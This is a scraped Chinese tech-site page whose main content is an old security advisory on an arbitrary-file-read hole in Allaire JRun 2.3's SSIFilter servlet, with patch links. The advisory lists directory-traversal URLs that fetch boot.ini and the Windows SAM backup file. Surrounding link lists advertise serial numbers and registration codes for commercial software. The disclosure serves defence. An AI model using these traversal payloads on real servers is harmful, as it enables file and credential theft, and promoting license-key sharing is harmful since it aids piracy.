- 1PS提示:因為圖層已鎖定,無法編輯圖層的處理方法
- 2picacg蘋果版怎么找不到|picacg ios版是不是下架了介紹
- 3Adobe Illustrator CS5 序列號大全
- 4ACDsee注冊碼免費分享(含ACDsee18、ACDsee10等版本)
- 5Potato(土豆聊天)怎么換頭像|Potato app更改頭像方法介紹
- 6PDF瀏覽器能看3D文件嗎?PDF瀏覽器看3D文件圖文詳細教程
- 7Potato(馬鈴薯聊天)怎么注冊不了|Potato不能注冊處理方法介紹
- 8最新的Adobe Illustrator CS4序列號大全
- 9Intel i7-9700K性能跑分曝光:同代提升約12%
- 10qq郵件是否已讀怎么看 QQ郵箱已經發出去的郵件怎么知道對方是否已經查看
- 11XP系統怎么清除緩存?
- 12Intel Z390主板有望10月8日公布:8核9代酷睿隨后登場
[摘要]涉及程序: JRUN 描述: Allaire JRUN 2.3 查看任意文件漏洞 詳細: Allaire 的 JRUN 服務器 2.3上存在多重顯示代碼漏洞。該漏洞允許攻擊者在 WEB 服務器上查看...
涉及程序: JRUN
描述:
Allaire JRUN 2.3 查看任意文件漏洞
詳細:
Allaire 的 JRUN 服務器 2.3上存在多重顯示代碼漏洞。該漏洞允許攻擊者在 WEB 服務器上查看根目錄下的任意文件的源代碼。
JRun 2.3 使用 Java Servlets 解析各種各樣類型的頁面(例如:HTML, JSP等等)。基于rules.properties 和 servlets.properties 的文件設置,可能利用URL前綴"/servlet/"調用任何servlet。
它可能使用 Jrun 的 SSIFilter servlet 在目標系統上檢索任意的文件。下列 2 個例子顯示出能被用來檢索任意的文件的 URLs :
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t
est.jsp
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../boot.ini
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../.
./../../../../winnt/repair/sam._
http://jrun:8000/servlet/ssifilter/../../test.jsp
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini
http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._
注意:假設JRun在主機“ jrun ”上運行,端口8000。
受影響的系統:
Allaire JRun 2.3.x
解決方案:
下載并安裝補丁:
Allaire patch jr233p_ASB00_28_29
http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip
Windows 95/98/NT/2000 and Windows NT Alpha
Allaire patch jr233p_ASB00_28_29tar
http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz
UNIX/Linux patch - GNU gzip/tar
推薦資訊 總人氣榜
最新教程 本月人氣
- 1怎么拆分復制的Access97數據庫
- 2ASP+Access的安全隱患及對策_ASP圖文說明教程
- 3Asp.net在線備份、壓縮與修好Access數據庫示例代碼_asp.net圖文說明教程
- 4微軟MSDN版office2016專業增強版iso鏡像官方下載地址
- 5微軟office365訂閱用戶已可升級office2016正式版
- 6net設置access數據庫示例分享_asp.net圖文說明教程
- 7ASP代碼完成access隨機顯示不重復記錄_ASP圖文說明教程
- 8access 數據連接程序_ASP圖文說明教程
- 9ACCESS的數據庫安全問題回答
- 10Access數據庫怎么壓縮與修好
- 11在VB中運行MicrosoftAccess報表的好方法
- 12AccessMenuBarApps 讓你的 Menu Bar 不再擁擠
- 1獵豹瀏覽器搶票不受12306新版驗證碼影響
- 2360手機助手紅包怎么提現 360手機助手紅包提現設置流程
- 3160wifi遠程桌面怎么連接 160wifi遠程桌面連接設置方法
- 4微信PC版1.0.7.33官方下載公布 修好bug優化軟件
- 5ios9不越獄怎么恢復短信與照片 ios9不越獄恢復短信與照片圖文說明教程
- 610天學會php之首天
- 7抱抱app怎么玩 抱抱app使用圖文說明教程圖
- 8抱抱app免費隨機通話使用圖文說明教程(圖文流程)
- 9yy游戲直播怎么開 yy游戲直播打開方法
- 10手機登12306驗證碼總是出錯處理方法介紹
- 11Linux內核4.2優化了哪一些地方?
- 12linux系統使用命令維護RHCS的方法
相關文章
- Allair JRUN 非法讀取 WEB-INF 漏洞
- Netscape 修好 JAVA 安全漏洞
- Sun Java Web Server 能讓攻擊者遠程執行任意命令
- Tomcat 3.1 存在暴露網站路徑問題
- Tomcat 暴露JSP文件內容
- IBM WebSphere Application Server 暴露JSP文件內容
- JRun 2.3.x 范例文件暴露網站安全信息
- 在HTTP請求中添加特殊字符導致暴露JSP源代碼文件
- 通過提交超長的GET請求導致IBM HTTP Server遠程溢出
- Unify的eWave ServletExec拒絕服務漏洞
- JSP圖文詳細教程(二)
- JSP圖文詳細教程(3)--JSP中”預定義變量”的使用
